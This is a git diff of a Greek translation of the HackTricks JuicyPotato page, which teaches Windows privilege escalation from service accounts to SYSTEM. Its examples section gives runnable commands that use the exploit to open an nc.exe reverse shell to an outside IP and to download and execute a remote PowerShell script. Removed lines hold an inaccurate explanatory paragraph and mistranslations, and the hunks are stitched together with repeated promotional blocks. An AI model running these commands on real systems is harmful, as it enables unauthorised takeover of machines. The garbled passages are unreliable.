Μάθετε περισσότερα για τα διακριτικά σε αυτά τα εκπαιδευτικά εγχειρίδια: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) και [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε την [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Συμμετάσχετε** στην [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας στο hacking υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** \[**αποθετήριο hacktricks-cloud**]\(https://github
|
||||
|
||||
</details>
|
||||
Μάθετε περισσότερα για τα διακριτικά σε αυτά τα εγχειρίδια: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) και [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
|
||||
|
|
|
@ -4,16 +4,30 @@
|
|||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; Ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε την [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε τη [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε** στην [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Εγγραφείτε** στη [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**αποθετήρια hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι να καταπολεμήσει τις απαγωγές λογαριασμών και τις επιθέσεις με αντάλλαγμα λύτρων που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
{% hint style="warning" %}
|
||||
**Το JuicyPotato δεν λειτουργεί** στα Windows Server 2019 και στα Windows 10 build 1809 και μεταγενέστερα. Ωστόσο, μπορείτε να χρησιμοποιήσετε τα [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) για να **εκμεταλλευτείτε τα ίδια προνόμια και να αποκτήσετε πρόσβαση σε επίπεδο `NT AUTHORITY\SYSTEM`**. _**Ελέγξτε:**_
|
||||
**Το JuicyPotato δεν λειτουργεί** στα Windows Server 2019 και στα Windows 10 έκδοση 1809 και μετά. Ωστόσο, τα [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) μπορούν να χρησιμοποιηθούν για να **εκμεταλλευτούν τα ίδια προνόμια και να κερδίσουν πρόσβαση σε επίπεδο `NT AUTHORITY\SYSTEM`**. _**Ελέγξτε:**_
|
||||
{% endhint %}
|
||||
|
||||
{% content-ref url="roguepotato-and-printspoofer.md" %}
|
||||
|
@ -22,29 +36,45 @@
|
|||
|
||||
## Juicy Potato (κατάχρηση των χρυσών προνομίων) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
|
||||
|
||||
_Μια γλυκιά έκδοση του_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, με λίγο χυμό, δηλαδή ένα εργαλείο **Ανόδου Προνομίων Τοπικού Επιπέδου, από Λογαριασμούς Υπηρεσίας Windows σε NT AUTHORITY\SYSTEM**_
|
||||
_Μια γλυκιά εκδοχή του_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, με λίγο χυμό, δηλαδή **ένα εργαλείο Ανόδου Προνομίων Τοπικού Επίπεδου, από Λογαριασμούς Υπηρεσίας Windows σε NT AUTHORITY\SYSTEM**_
|
||||
|
||||
#### Μπορείτε να κατεβάσετε το juicypotato από [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
|
||||
|
||||
### Περίληψη <a href="#summary" id="summary"></a>
|
||||
### Σύνοψη <a href="#summary" id="summary"></a>
|
||||
|
||||
**[Από το Readme του juicy-potato](https://github.com/ohpe/juicy-potato/blob/master/README.md):**
|
||||
[**Από το Readme του juicy-potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
|
||||
|
||||
Το [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) και οι [παραλλαγές](https://github.com/decoder-it/lonelypotato) του εκμεταλλεύονται την αλυσίδα ανόδου προνομίων βασισμένη στην υπηρεσία [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) έχοντας τον ακροατή MiTM στη διεύθυνση `127.0.0.1:6666` και όταν έχετε τα προνόμια `SeImpersonate` ή `SeAssignPrimaryToken`. Κατά την αναθεώρηση μιας εγκατάστασης Windows, ανακαλύψαμε μια ρύθμιση όπου το `BITS` ήταν απενεργοποιημένο εσκεμμένα και η θύρα `6666` ήταν κατειλημμένη.
|
||||
Το [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) και οι [παραλλαγές του](https://github.com/decoder-it/lonelypotato) εκμεταλλεύονται την αλυσίδα ανόδου προνομίων βασισμένη στην υπηρεσία [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) έχοντας τον ακροατή MiTM στο `127.0.0.1:6666` και όταν έχετε προνόμια `SeImpersonate` ή `SeAssignPrimaryToken`. Κατά την αναθεώρηση μιας εγκατάστασης Windows, βρήκαμε μια ρύθμιση όπου το `BITS` ήταν εσκεμμένα απενεργοποιημένο και η θύρα `6666` ήταν κατειλημμένη.
|
||||
|
||||
Αποφασίσαμε να εκμεταλλευτούμε το [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Πείτε γεια στο Juicy Potato**.
|
||||
Αποφασίσαμε να όπλισουμε το [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Πείτε γεια στο Juicy Potato**.
|
||||
|
||||
> Για τη θεωρία, δείτε [Rotten Potato - Ανόδος Προνομίων από Λογαριασμούς Υπηρεσίας σε SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) και ακολουθήστε την αλυσίδα των συνδέσμων και των αναφορών.
|
||||
> Για τη θεωρία, δείτε το [Rotten Potato - Ανόδου Προνομίων από Λογαριασμούς Υπηρεσίας σε SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) και ακολουθήστε την αλυσίδα των συνδέσμων και αναφορών.
|
||||
|
||||
Ανακαλύψαμε ότι, εκτός από το `BITS`, υπάρχουν αρκετοί COM servers που μπορούμε να καταχρηστείτε. Απλά πρέπει να:
|
||||
Ανακαλύψαμε ότι, εκτός από το `BITS`, υπάρχουν αρκετοί COM servers που μπορούμε να καταχρηστικοποιήσουμε. Απλώς πρέπει:
|
||||
|
||||
1. είναι δυνατή η δημιουργία αντικειμένων από τον τρέχοντα χρήστη, συνήθως ένας "χρήστης υπηρεσίας" που έχει προνόμια προσομοίωσης
|
||||
2. υλοποιούν τη διεπαφή `IMarshal`
|
||||
3. εκτελούνται ως χρήστης με αυξημένα προνόμια (SYSTEM, Administrator, ...)
|
||||
1. να είναι δυνατή η δημιουργία από τον τρέχοντα χρήστη, συνήθως ένας "χρήστης υπηρεσίας" που έχει προνόμια υποκατάστασης
|
||||
2. να υλοποιούν τη διεπαφή `IMarshal`
|
||||
3. να τρέχουν ως χρήστης με αυξημένα προνόμια (SYSTEM, Διαχειριστής, ...)
|
||||
|
||||
Μετά από μερικές δοκιμές, αποκτήσαμε και δοκιμάσαμε μια εκτενή λίστα [ενδιαφέροντων CLSID](http://ohpe.it/juicy-potato/CLSID/) σε διάφορες εκδόσεις των Windows.
|
||||
Μετά από μερικές δοκιμές, αποκτήσαμε και δοκιμάσαμε μια εκτεταμένη λίστα [ενδιαφέροντων CLSID's](http://ohpe.it/juicy-potato/CLSID/) σε διάφορες εκδόσεις των Windows.
|
||||
|
||||
### Λεπτομέρειες για το Juicy
|
||||
### Λεπτομέρειες Juicy <a href="#juicy-details" id="juicy-details"></a>
|
||||
|
||||
Το JuicyPotato σάς επιτρέπει να:
|
||||
|
||||
* **Στόχος CLSID** _επιλέξτε οποιοδήποτε CLSID θέλετε._ [_Εδώ_](http://ohpe.it/juicy-potato/CLSID/) _μπορείτε να βρείτε τη λίστα οργανωμένη ανά λειτουργικό σύστημα._
|
||||
* **Πόρτα Ακρόασης COM** _ορίστε την πόρτα ακρόασης COM που προτιμάτε (αντί για την σκληροκωδικοποιημένη 6666)_
|
||||
* **Διεύθυνση IP Ακρόασης COM** _δέστε τον εξυπηρετητή σε οποιαδήποτε IP_
|
||||
* **Λειτουργία Δημιουργίας Διεργασίας** _ανάλογα με τα προνόμια υποκατάστασης του χρήστη μπορείτε να επιλέξετε από:_
|
||||
* `CreateProcessWithToken` (χρειάζεται `SeImpersonate`)
|
||||
* `CreateProcessAsUser` (χρειάζεται `SeAssignPrimaryToken`)
|
||||
* `και τα δύο`
|
||||
* **Διεργασία για εκκίνηση** _εκκινήστε ένα εκτελέσιμο ή σενάριο αν η εκμετάλλευση επιτύχει_
|
||||
* **Παράμετρος Διεργασίας** _προσαρμόστε τις παραμέτρους της διεργασίας που εκκινείται_
|
||||
* **Διεύθυνση Διακομιστή RPC** _για μια αθόρυβη προσέγγιση μπορείτε να πιστοποιηθείτε σε έναν εξωτερικό διακομιστή RPC_
|
||||
* **Πόρτα Διακομιστή RPC** _χρήσιμο αν θέλετε να πιστοποιηθείτε σε έναν εξωτερικό διακομιστή και το τείχος πυρασφάλειας αποκλείει τη θύρα `135`..._
|
||||
* **Λειτουργία ΔΟΚΙΜΗΣ** _κυρίως για δοκιμαστικούς σκοπούς, δηλαδή δοκιμή CLSIDs. Δημιουργεί το DCOM και εκτυπώνει τον χρήστη του τοκέν. Δείτε_ [_εδώ για δοκιμή_](http://ohpe.it/juicy-potato/Test/)
|
||||
### Χρήση <a href="#usage" id="usage"></a>
|
||||
```
|
||||
T:\>JuicyPotato.exe
|
||||
JuicyPotato v0.1
|
||||
|
@ -63,21 +93,21 @@ Optional args:
|
|||
```
|
||||
### Τελικές σκέψεις <a href="#final-thoughts" id="final-thoughts"></a>
|
||||
|
||||
**[Από το αρχείο Readme του juicy-potato](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts):**
|
||||
[**Από το Readme του juicy-potato**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
|
||||
|
||||
Εάν ο χρήστης έχει τα δικαιώματα `SeImpersonate` ή `SeAssignPrimaryToken`, τότε είστε **SYSTEM**.
|
||||
Αν ο χρήστης έχει δικαιώματα `SeImpersonate` ή `SeAssignPrimaryToken` τότε είστε **SYSTEM**.
|
||||
|
||||
Είναι σχεδόν αδύνατο να αποτρέψετε την κατάχρηση όλων αυτών των COM Servers. Μπορείτε να σκεφτείτε να τροποποιήσετε τα δικαιώματα αυτών των αντικειμένων μέσω του `DCOMCNFG`, αλλά καλή τύχη, αυτό θα είναι πρόκληση.
|
||||
Είναι σχεδόν αδύνατο να αποτρέψετε την κατάχρηση όλων αυτών των COM Servers. Μπορείτε να σκεφτείτε να τροποποιήσετε τα δικαιώματα αυτών των αντικειμένων μέσω του `DCOMCNFG` αλλά καλή τύχη, αυτό θα είναι πρόκληση.
|
||||
|
||||
Η πραγματική λύση είναι να προστατεύσετε τους ευαίσθητους λογαριασμούς και τις εφαρμογές που εκτελούνται υπό τους λογαριασμούς `* SERVICE`. Η διακοπή του `DCOM` θα αναστείλει σίγουρα αυτήν την εκμετάλλευση, αλλά μπορεί να έχει σοβαρές επιπτώσεις στο υποκείμενο λειτουργικό σύστημα.
|
||||
Η πραγματική λύση είναι να προστατεύσετε ευαίσθητους λογαριασμούς και εφαρμογές που εκτελούνται υπό τους λογαριασμούς `* SERVICE`. Η διακοπή του `DCOM` θα αναστείλει σίγουρα αυτήν την εκμετάλλευση αλλά θα μπορούσε να έχει σοβαρές επιπτώσεις στο υποκείμενο λειτουργικό σύστημα.
|
||||
|
||||
Από: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
|
||||
|
||||
## Παραδείγματα
|
||||
|
||||
Σημείωση: Επισκεφθείτε [αυτήν τη σελίδα](https://ohpe.it/juicy-potato/CLSID/) για μια λίστα με τα CLSIDs που μπορείτε να δοκιμάσετε.
|
||||
Σημείωση: Επισκεφθείτε [αυτήν τη σελίδα](https://ohpe.it/juicy-potato/CLSID/) για μια λίστα με CLSIDs προς δοκιμή.
|
||||
|
||||
### Λήψη αντίστροφης κατεύθυνσης κέλυφους με το nc.exe
|
||||
### Λήψη αντίστροφου κέλυφους nc.exe
|
||||
```
|
||||
c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *
|
||||
|
||||
|
@ -90,52 +120,54 @@ Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
|
|||
|
||||
c:\Users\Public>
|
||||
```
|
||||
### Αναστροφή Powershell
|
||||
|
||||
Η αναστροφή Powershell είναι μια τεχνική που χρησιμοποιείται για να εκτελέσετε κώδικα Powershell από μια εφαρμογή ή μια διαδικασία με υψηλότερα δικαιώματα. Αυτό μπορεί να επιτρέψει σε έναν επιτιθέμενο να αναβαθμίσει τα δικαιώματά του και να αποκτήσει πρόσβαση διαχειριστή σε ένα σύστημα Windows.
|
||||
|
||||
Για να εκτελέσετε μια αναστροφή Powershell, ακολουθήστε τα παρακάτω βήματα:
|
||||
|
||||
1. Επιλέξτε μια εφαρμογή ή μια διαδικασία με υψηλότερα δικαιώματα που μπορείτε να εκτελέσετε κώδικα Powershell από αυτήν.
|
||||
2. Κατεβάστε ένα αντίγραφο του αρχείου `JuicyPotato.exe` από τον σύνδεσμο [εδώ](https://github.com/ohpe/juicy-potato/releases).
|
||||
3. Εκτελέστε το αρχείο `JuicyPotato.exe` με τις κατάλληλες παραμέτρους για να εκτελέσετε τον κώδικα Powershell. Για παράδειγμα, μπορείτε να χρησιμοποιήσετε την παράμετρο `-t` για να καθορίσετε τον τύπο του αντικειμένου που θα εκτελέσει τον κώδικα Powershell και την παράμετρο `-p` για να καθορίσετε τον καταχωρητή που θα χρησιμοποιηθεί.
|
||||
4. Αν η αναστροφή Powershell είναι επιτυχής, θα εκτελεστεί ο κώδικας Powershell με υψηλότερα δικαιώματα και θα αποκτήσετε πρόσβαση διαχειριστή στο σύστημα Windows.
|
||||
|
||||
Είναι σημαντικό να σημειωθεί ότι η αναστροφή Powershell είναι μια επιθετική τεχνική και πρέπει να χρησιμοποιείται μόνο για νόμιμους σκοπούς, όπως η δοκιμή ασφάλειας συστημάτων.
|
||||
### Powershell αναστροφή
|
||||
```
|
||||
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
|
||||
```
|
||||
### Εκκίνηση νέου CMD (εάν έχετε πρόσβαση RDP)
|
||||
### Έναρξη νέου CMD (εάν έχετε πρόσβαση RDP)
|
||||
|
||||
![](<../../.gitbook/assets/image (37).png>)
|
||||
![](<../../.gitbook/assets/image (297).png>)
|
||||
|
||||
## Προβλήματα με το CLSID
|
||||
## Προβλήματα CLSID
|
||||
|
||||
Συχνά, το προεπιλεγμένο CLSID που χρησιμοποιεί το JuicyPotato **δεν λειτουργεί** και η εκμετάλλευση αποτυγχάνει. Συνήθως, απαιτούνται πολλές προσπάθειες για να βρεθεί ένα **εργαστήριο CLSID**. Για να λάβετε μια λίστα με τα CLSID που πρέπει να δοκιμάσετε για ένα συγκεκριμένο λειτουργικό σύστημα, πρέπει να επισκεφθείτε αυτήν τη σελίδα:
|
||||
Συχνά, το προεπιλεγμένο CLSID που χρησιμοποιεί το JuicyPotato **δεν λειτουργεί** και η εκμετάλλευση αποτυγχάνει. Συνήθως, απαιτούνται πολλές προσπάθειες για να βρείτε ένα **λειτουργικό CLSID**. Για να λάβετε μια λίστα με τα CLSID που μπορείτε να δοκιμάσετε για ένα συγκεκριμένο λειτουργικό σύστημα, πρέπει να επισκεφθείτε αυτήν τη σελίδα:
|
||||
|
||||
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
|
||||
|
||||
### **Έλεγχος των CLSID**
|
||||
### **Έλεγχος CLSID**
|
||||
|
||||
Πρώτα, θα χρειαστείτε μερικά εκτελέσιμα αρχεία εκτός από το juicypotato.exe.
|
||||
Αρχικά, θα χρειαστείτε μερικά εκτελέσιμα εκτός από το juicypotato.exe.
|
||||
|
||||
Κατεβάστε το [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) και φορτώστε το στην PS συνεδρίασή σας, κατεβάστε και εκτελέστε το [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Αυτό το σενάριο θα δημιουργήσει μια λίστα πιθανών CLSID για να δοκιμάσετε.
|
||||
Κατεβάστε το [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) και φορτώστε το στη συνεδρία PS σας, κατεβάστε και εκτελέστε το [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Αυτό το σενάριο θα δημιουργήσει μια λίστα πιθανών CLSID για δοκιμή.
|
||||
|
||||
Στη συνέχεια, κατεβάστε το [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(αλλάξτε τη διαδρομή για τη λίστα CLSID και για το εκτελέσιμο juicypotato) και εκτελέστε το. Θα αρχίσει να δοκιμάζει κάθε CLSID και **όταν ο αριθμός θύρας αλλάξει, θα σημαίνει ότι το CLSID λειτούργησε**.
|
||||
Στη συνέχεια, κατεβάστε το [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(αλλάξτε τη διαδρομή προς τη λίστα CLSID και προς το εκτελέσιμο juicypotato) και εκτελέστε το. Θα αρχίσει να δοκιμάζει κάθε CLSID, και **όταν ο αριθμός θύρας αλλάξει, θα σημαίνει ότι το CLSID λειτούργησε**.
|
||||
|
||||
**Ελέγξτε** τα εργαστήρια CLSID **χρησιμοποιώντας την παράμετρο -c**
|
||||
**Ελέγξτε** τα λειτουργικά CLSID **χρησιμοποιώντας την παράμετρο -c**
|
||||
|
||||
## Αναφορές
|
||||
|
||||
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε εάν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; Ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε την [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Εργάζεστε σε μια εταιρεία **κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε στην** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Εγγραφείτε στη** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,21 +4,35 @@
|
|||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
